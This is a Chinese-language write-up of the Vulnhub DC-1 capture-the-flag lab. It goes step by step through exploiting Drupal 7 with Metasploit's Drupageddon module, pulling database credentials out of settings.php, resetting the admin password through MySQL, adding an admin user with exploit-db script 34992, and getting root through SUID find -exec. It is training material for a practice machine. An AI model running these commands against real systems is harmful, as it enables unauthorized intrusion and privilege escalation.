Vulnhub-DC-1

配置信息:
靶机下载地址:https://www.vulnhub.com/entry/dc-1,292/
靶机:DC1 (VirtualBox)    IP:192.168.67.200
攻机:Kali  (Local)             IP:192.168.67.109

目标:获取5个flag

Vulnhub-DC-1_第1张图片

开始游戏:

nmap -sn 192.168.67.0/24

获取目标IP地址:192.168.67.200

Vulnhub-DC-1_第2张图片

扫描目标信息:

nmap -A -p- 192.168.67.200

获取目标开放端口:22 [ssh] || 80[http] || 111[rpc]

获取目标系统信息:Linux 3.2 - 3.16

Vulnhub-DC-1_第3张图片

发现开放80端口,因此尝试登录网页,浏览器输入:http://192.168.67.200

Vulnhub-DC-1_第4张图片

左上方发现CMS为Drupal


CMS:Drupal7

Web servers:Apache2.2.22

Programming languages:PHP5.4.45

Operating system:Debian

JavaScript libraries:JQuery1.4.4 jQuery UI1.8.7

使用 wappalyzer 插件确认获取网站相关信息:

注:Wappalyzer是一款能够分析目标网站所采用的平台构架、网站环境、服务器配置环境、JavaScript框架、编程语言等参数的网站技术分析插件


确认 CMS 为 Drupal,利用msfconsole获取meterpreter:(use rank:excellent)

search drupaluse exploit/multi/http/drupal_drupageddonshow optionsset RHOSTS 192.168.67.200exploit

Vulnhub-DC-1_第5张图片

在meterpreter下获取交互式反弹shell:

meterpreter > shellpython -c 'import pty;pyt.spawn("\bin\sh")'$ ls

Vulnhub-DC-1_第6张图片

输入命令 ls 发现有一个 flag1.txt,果断查看它,这就得到了flag1

$lslsCOPYRIGHT.txt       MAINTAINERS.txt  includes     robots.txt  web.configINSTALL.mysql.txt   README.txt       index.php    scripts     xmlrpc.phpINSTALL.pgsql.txt   UPGRADE.txt      install.php  sitesINSTALL.sqlite.txt  authorize.php    misc         themesINSTALL.txt         cron.php         modules      update.phpLICENSE.txt         flag1.txt        profiles     user$cat flag1.txtcat flag1.txtEvery good CMS needs a config file - and so do you

每一个好的 CMS 都需要一个配置文件,你也如此。

根据falg1的提示,利用搜索引擎查询Drupal的配置文件?

Vulnhub-DC-1_第7张图片

Vulnhub-DC-1_第8张图片

得到一个地址:/sites/default/settings.php —— 利用 more 查看全部信息

获取 flag2,这就得到了第二个 flag2

$more sites/default/settings.phpmore sites/default/settings.php/** * * flag2 * Brute force and dictionary attacks aren't the * only ways to gain access (and you WILL need access). * What can you do with these credentials? * */

暴力破解和字典攻击并不是取得访问权限的唯一方式(你需要访问权限),利用这些凭证你能做什么?

这是 flag2 给我们留下的信息,再回看该配置文件,会发现这里有关于数据库的详细信息:

$databases = array (  'default' =>   array (    'default' =>     array (      'database' => 'drupaldb',      'username' => 'dbuser',      'password' => 'R0ck3t',      'host' => 'localhost',      'port' => '',      'driver' => 'mysql',      'prefix' => '',    ),

尝试进入 mysql :

$ mysql -h localhost -u dbuser -pmysql -h localhost -u dbuser -pEnter password: R0ck3t

 

show databases;use drupaldb;show tables;select * from users;

Vulnhub-DC-1_第9张图片

查询有哪些表时,可以很明显的看到有 users 这个表,果断 select 一发再说

Vulnhub-DC-1_第10张图片

这就得到了用户名和一串奇奇怪怪的密码,再次利用搜索引擎,可搜索:drupal7忘记密码怎么办?drupal7如何重置密码?drupal7如何修改密码?类似这些问题,让开发者或研究人士告诉我们答案

Vulnhub-DC-1_第11张图片

Vulnhub-DC-1_第12张图片

还真告诉了,直接重置管理员密码登录。

exit$ls$php ./scripts/password-hash.sh 123456mysql -h localhost -u dbuser -pEnter password:R0ck3tuse drupaldb;update users set pass='$S$DQZsZLqxCbnNCRuvOFCQBC2snsbkjGrH3Xw4nqxxhuYIONkuC4dP' where name='admin';

登录成功

Vulnhub-DC-1_第13张图片


有时直接修改太过明目张胆,那么有没有较隐蔽的方法呢?有什么比较隐蔽的方法能够也是以管理员的身份去登录的呢?要不试试添加一个管理员帐号?

首先得知道版本号,看能否利用,一般在modules/system/system.info可以看到版本号,如果不知道,利用搜索引擎也可得知这一信息:

Vulnhub-DC-1_第14张图片

Vulnhub-DC-1_第15张图片

cat modules/system/system.info

Vulnhub-DC-1_第16张图片

得到该Drupal的版本为7.24

在kali上查询是否存在添加管理员漏洞可利用:

searchexploit drupal

Vulnhub-DC-1_第17张图片

发现有 Add Admin User 可以利用且版本符合条件

copy一份到家目录下,随后添加一个具有管理员权限的账户

cp /usr/share/exploitdb/exploits/php/webapps/34992.py /root/34992.pycd ~python 34992.py -hpython 34992.py -t http://192.168.67.200 -u whoami -p 123456

Vulnhub-DC-1_第18张图片

登录成功

Vulnhub-DC-1_第19张图片


随后浏览页面[每个按钮都去点],看有无新发现,在find content找到了flag3

点击 flag3,可以获得flag3详细信息:

特殊的PERMS可以帮助找到密码-但您需要-exec该命令来隐藏的内容。

很明显的提示:find+perms+exec 命令用来提权

首先利用 find 命令查看有哪些 suid 命令:

find / -perm -4000

Vulnhub-DC-1_第20张图片

利用 find 提权,find 提权有两种方式:


/*这是第一种*/find ./ acce -exec '/bin/sh' \;

Vulnhub-DC-1_第21张图片


/*这是第二种*/touch bccefind bcce -exec '/bin/sh' \;

Vulnhub-DC-1_第22张图片


这就拿到了 root 权限,查找有无flag4

可以发现 flag4 是一个用户...

find / -name "flag4cd /home/flag4cat flag4.txt

Vulnhub-DC-1_第23张图片

你能利用同样的方法用root权限找到或访问到flag吗?

貌似我们已经进入了root环境下,竟然flag4在家母录下,那么flag5会不会在root目录下?

—— 找到 flag5:thefinalflag

Vulnhub-DC-1_第24张图片

游戏结束


总结:

0:MSF 漏洞模块利用

1:配置文件

2:搜索引擎的合理应用

3:提权

你可能感兴趣的:(Vulnhub)